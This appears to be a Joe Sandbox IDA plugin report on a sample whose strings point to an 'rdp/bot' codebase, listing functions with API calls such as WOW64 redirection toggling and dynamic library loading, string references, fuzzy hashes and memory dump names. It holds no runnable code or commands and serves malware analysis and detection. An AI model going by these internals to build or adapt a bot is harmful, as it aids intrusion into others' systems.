Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 603ca290bf209a878f6e868cf7e223666875e6445b81fdf84269e7a9617f625c
Instruction ID: dbf1b8ebcbe025e115860db8f7bc703f5f15cb7394644d175f3dae832648e6f2
Opcode Fuzzy Hash: 603ca290bf209a878f6e868cf7e223666875e6445b81fdf84269e7a9617f625c
Instruction Fuzzy Hash: 49410871A08587A1FB50AF51A960BBCA260AF01368FC48033DE4D4B691DFBDE986D360

Function 00007FF7C1ABA074 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF7C1ABA11D
VirtualProtect.KERNEL32 ref: 00007FF7C1ABA185
GetLastError.KERNEL32 ref: 00007FF7C1ABA18F

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FF7C1ABA195
Unknown pseudo relocation protocol version %d., xrefs: 00007FF7C1ABA079
Mingw-w64 runtime failure:, xrefs: 00007FF7C1ABA03B
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF7C1ABA132
Address %p has no image-section, xrefs: 00007FF7C1ABA0D5

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 637304234-2693646698
Opcode ID: 8add22a7cc3fa846a04094a8ab67a6e2d6d24e8b84f6c34f8bfff9ca3ede8a1a
Instruction ID: 1862ea7d695d1f800068523e09d2d247e361e7e8ec951b2dedda29b32ee495a0
Opcode Fuzzy Hash: 8add22a7cc3fa846a04094a8ab67a6e2d6d24e8b84f6c34f8bfff9ca3ede8a1a
Instruction Fuzzy Hash: A931A035B09A8686EB04EF25E851AACA361FB94BB4F848136DD0C47354DEBDE446C360

Function 00007FF7C1AB3D50 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF7C1AB3DEA
_errno.MSVCRT ref: 00007FF7C1AB3E08
_errno.MSVCRT ref: 00007FF7C1AB3E14

Strings

C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF7C1AB3DBB
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF7C1AB3E3B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB3DD0
(value != NULL), xrefs: 00007FF7C1AB3DC2
ini_get_uint32, xrefs: 00007FF7C1AB3DC9, 00007FF7C1AB3E34

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: 13d5c5678f11fb37cf099ef68e4cb27cc21ac9529200067acbd87b04a0ad8171
Instruction ID: aee6f2b65233784c9aebc2235c64ad829fd8141d686d0820001dbb064aeb9fb2
Opcode Fuzzy Hash: 13d5c5678f11fb37cf099ef68e4cb27cc21ac9529200067acbd87b04a0ad8171
Instruction Fuzzy Hash: C8218071A0868696E710EF15E840BADB760BB447A4FC44137EE4C47754DFBDE849C760

Function 00007FF7C1ABDE7E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7C1ABDE8E
GetProcAddress.KERNEL32 ref: 00007FF7C1ABDEA5
LoadLibraryW.KERNEL32 ref: 00007FF7C1ABDEB3
GetProcAddress.KERNEL32 ref: 00007FF7C1ABDEC3

Strings

advapi32.dll, xrefs: 00007FF7C1ABDEAC
rand_s, xrefs: 00007FF7C1ABDE9B
SystemFunction036, xrefs: 00007FF7C1ABDEB9
msvcrt.dll, xrefs: 00007FF7C1ABDE87

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 33cba482a29e878b2114b817fbad7b4337690f04b4dd8230bf2d19bb2c54ff2f
Instruction ID: 6109d933764b8255b5c2c730b8c80df541c4631fc1a7526ebf695d1e4d5b83ec
Opcode Fuzzy Hash: 33cba482a29e878b2114b817fbad7b4337690f04b4dd8230bf2d19bb2c54ff2f
Instruction Fuzzy Hash: 5EF0B724E0AA9794EB05FF11FC649B9A7A4BF187B4BC40533C80D47320EFADA55AC324

Function 00007FF7C1AB86AC Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7C1AB86E6
strlen.MSVCRT ref: 00007FF7C1AB86F1

Strings

(needle != NULL), xrefs: 00007FF7C1AB871C
C:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FF7C1AB8715, 00007FF7C1AB874E, 00007FF7C1AB8787
str_match, xrefs: 00007FF7C1AB8723, 00007FF7C1AB875C, 00007FF7C1AB8795
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB872A, 00007FF7C1AB8763, 00007FF7C1AB879C
(pattern != NULL), xrefs: 00007FF7C1AB8755
((match == NULL) || (match_len != NULL)), xrefs: 00007FF7C1AB878E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-892027187
Opcode ID: 51c6127cf5878e06315752245c4e77c7e4c4891824f2a5c223a2873cb35ce124
Instruction ID: f2107c73a87cebb2f2181abc0a60c10ea5faf1eb1d3da47efae24d1016a5bbc8
Opcode Fuzzy Hash: 51c6127cf5878e06315752245c4e77c7e4c4891824f2a5c223a2873cb35ce124
Instruction Fuzzy Hash: 5451B161A082C756FB1AEE59B810FBD96517F117E8FC88033DD0E07291DEAEE561C360

Function 00007FF7C1AB424C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C1AB2304: LoadLibraryA.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB2312

GetLastError.KERNEL32 ref: 00007FF7C1AB42C8

Part of subcall function 00007FF7C1AB2283: GetProcAddress.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22A3

Strings

Done, xrefs: 00007FF7C1AB42A4
fs_wow_redir_revert, xrefs: 00007FF7C1AB42AB, 00007FF7C1AB42D1
[I] (%s) -> %s, xrefs: 00007FF7C1AB42B2
Wow64RevertWow64FsRedirection, xrefs: 00007FF7C1AB426D
kernel32, xrefs: 00007FF7C1AB4259
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FF7C1AB42D8

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: 22c809322a5359600a0158dc99ea597a4efdb57cbb3d581b66afce8e9f2be1f2
Instruction ID: 69ad1fd50865a49f76bb0772f08f8d186997cec4c6ec6f2a119ec61893035716
Opcode Fuzzy Hash: 22c809322a5359600a0158dc99ea597a4efdb57cbb3d581b66afce8e9f2be1f2
Instruction Fuzzy Hash: B4119D70A0D68384FB54FF15A860BB8A2516F41369FC40437D81E877A2EEAEE544D720

Function 00007FF7C1AB41B0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C1AB2304: LoadLibraryA.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB2312

Part of subcall function 00007FF7C1AB2283: GetProcAddress.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22A3

GetLastError.KERNEL32 ref: 00007FF7C1AB4210

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

Done, xrefs: 00007FF7C1AB41EC
[I] (%s) -> %s, xrefs: 00007FF7C1AB41FA
Wow64DisableWow64FsRedirection, xrefs: 00007FF7C1AB41C8
kernel32, xrefs: 00007FF7C1AB41B4
[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FF7C1AB4220
fs_wow_redir_disable, xrefs: 00007FF7C1AB41F3, 00007FF7C1AB4219

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: a7c5e058be7684d559b53000f29e671dff9ea714b7f7818c333df49b89397c50
Instruction ID: fd38a69c6d4b890a5d47f393538bcae710a6e9e93c09ac45c6788a4af1d94140
Opcode Fuzzy Hash: a7c5e058be7684d559b53000f29e671dff9ea714b7f7818c333df49b89397c50
Instruction Fuzzy Hash: 990180B4A09A8394FB64FF15A860BBCD6526F51364FC40037D81E877A1EEBEE945D320

Function 00007FF7C1AB1A63 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AA1

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

GetProcessHeap.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AD4
HeapFree.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AE5

Strings

[I] (%s) -> Done(name=%s), xrefs: 00007FF7C1AB1AB2
units_cleanup, xrefs: 00007FF7C1AB1AAB

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: FreeHeap$LibraryProcessfflushfwrite
String ID: [I] (%s) -> Done(name=%s)$units_cleanup
API String ID: 1108967834-2645831314
Opcode ID: c5134a5a516f1671bb31426d62a13ed6907ccb2320aae0fd1190f0fa7e428d56
Instruction ID: 26dcb1eff01a1d70573b834b5d77c4d6a6f44630cf49e3370a4a2cef39ddcf7e
Opcode Fuzzy Hash: c5134a5a516f1671bb31426d62a13ed6907ccb2320aae0fd1190f0fa7e428d56
Instruction Fuzzy Hash: B011DB31A09A8681EB54FF11E850A7CA3A1BB45BA4F884437CD0D07360EFADF955C320

Function 00007FF7C1AB3349 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB3363
DeleteCriticalSection.KERNEL32(?,?,?,?,00007FF7C1AB1B2B,?,?,00000000,00007FF7C1AB1E55,?,?,?,?,?,?,00000001), ref: 00007FF7C1AB3390

Strings

debug_cleanup, xrefs: 00007FF7C1AB33A8
Done, xrefs: 00007FF7C1AB33A1
[I] (%s) -> %s, xrefs: 00007FF7C1AB33AF

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CriticalDeleteSectionfclose
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 3387974148-4247581856
Opcode ID: ce6166a030d9b927a629bb073a866b08a7422f5c411934c9de2c65f1d8dac0c7
Instruction ID: c853f2d61ebbeda424f1083571d00424d708332578d8456f36666fd24ad34fc6
Opcode Fuzzy Hash: ce6166a030d9b927a629bb073a866b08a7422f5c411934c9de2c65f1d8dac0c7
Instruction Fuzzy Hash: 0FF07F64A0A69285FB18BF55A9B5B7DA2A0BF40724FC4513BC40E473A2CFFEA055C770

Function 00007FF7C1ABA1BB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00007FF7C1AC8508,00000000,?,?,?,00007FF7C1AC8500,00007FF7C1AB1208,?,?,?,00007FF7C1AB1313), ref: 00007FF7C1ABA412

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF7C1ABA2B2
Unknown pseudo relocation bit size %d., xrefs: 00007FF7C1ABA33B
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7C1ABA3AD

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: 92cad9732728847cb24ab556fee675ca99765190e00efc1bf2c038ef7252aea2
Instruction ID: 8e0d0d7ff3b9e08a38e7cb741043a1997e862a38d20d393f69d676b17ed7b2aa
Opcode Fuzzy Hash: 92cad9732728847cb24ab556fee675ca99765190e00efc1bf2c038ef7252aea2
Instruction Fuzzy Hash: B0618C75B096928AEB10EF25D550BBCA760AB407B4F848133CE1D437E5DEBEE581C720

Function 00007FF7C1AB1FD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB1FEE
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB200B

Strings

[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FF7C1AB201B
module_current, xrefs: 00007FF7C1AB2014

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: 932d8f0b87f2ec5228bf48e551c9c89e3a3dfe2e3e3b4ae9b2d117c7db3c8caa
Instruction ID: dee7a61c85cb8d26b875e90b32b8a135b5f638c925d2bfd74736c939c73028b6
Opcode Fuzzy Hash: 932d8f0b87f2ec5228bf48e551c9c89e3a3dfe2e3e3b4ae9b2d117c7db3c8caa
Instruction Fuzzy Hash: 9AF03930A08A4281E720AF11E854BBEE761FB943A8FC40033D94D037A4DFADE208C760

Function 00007FF7C1ABE0B0 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7C1ABE12B
IsDBCSLeadByteEx.KERNEL32 ref: 00007FF7C1ABE146
MultiByteToWideChar.KERNEL32 ref: 00007FF7C1ABE19A
_errno.MSVCRT ref: 00007FF7C1ABE1A4

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: ea0e36834fd6c6aa59ef53b9805da5eb76483b36d931b6280d4f55a8ddee267b
Instruction ID: 87d88ff6b90fde7cc9cab9ea9206e2d958b34e0d70173b2976db42f2bbaa1f90
Opcode Fuzzy Hash: ea0e36834fd6c6aa59ef53b9805da5eb76483b36d931b6280d4f55a8ddee267b
Instruction Fuzzy Hash: 9E31A771A0C3C149F7309F21A800BBDA690AB657A4FA48136DE8D477D5DBBDD4458B21

Function 00007FF7C1ABA480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF7C1ABA536
signal.MSVCRT ref: 00007FF7C1ABA54B

Strings

CCG , xrefs: 00007FF7C1ABA496

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: ae9fd186646b773eee1821a5304905e802156a9f0a9826ef6c2c2d212f40fb0d
Instruction ID: 06ec6bf408a1a3841822ac44d9ceb0259233acd274d8ab77a431fa24872e295f
Opcode Fuzzy Hash: ae9fd186646b773eee1821a5304905e802156a9f0a9826ef6c2c2d212f40fb0d
Instruction Fuzzy Hash: 6C217C71E0D1C645FB68B9289454B7C91819F49330FD84A33CE0E873D2DEDEA9C14131

Function 00007FF7C1AB9F20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7C1AB9FDA

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7C1AB9FCD
Unknown error, xrefs: 00007FF7C1AB9F37

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 703e831fcde42ecc4aa7784432d7fd0331f3ac24d1e9fedbd279c4e7797a8ef3
Instruction ID: 2b7cb6f59c97dd537ffa95b96c15b7f77f778647404fc5b0ad58a829babcc963
Opcode Fuzzy Hash: 703e831fcde42ecc4aa7784432d7fd0331f3ac24d1e9fedbd279c4e7797a8ef3
Instruction Fuzzy Hash: D2114F62808E84C2D3119F1CE4417AEB3B0FF9A369F905326EBC817264DF6AD156C704

Function 00007FF7C1AB9F7B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7C1AB9FDA

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7C1AB9FCD
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF7C1AB9F7B

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

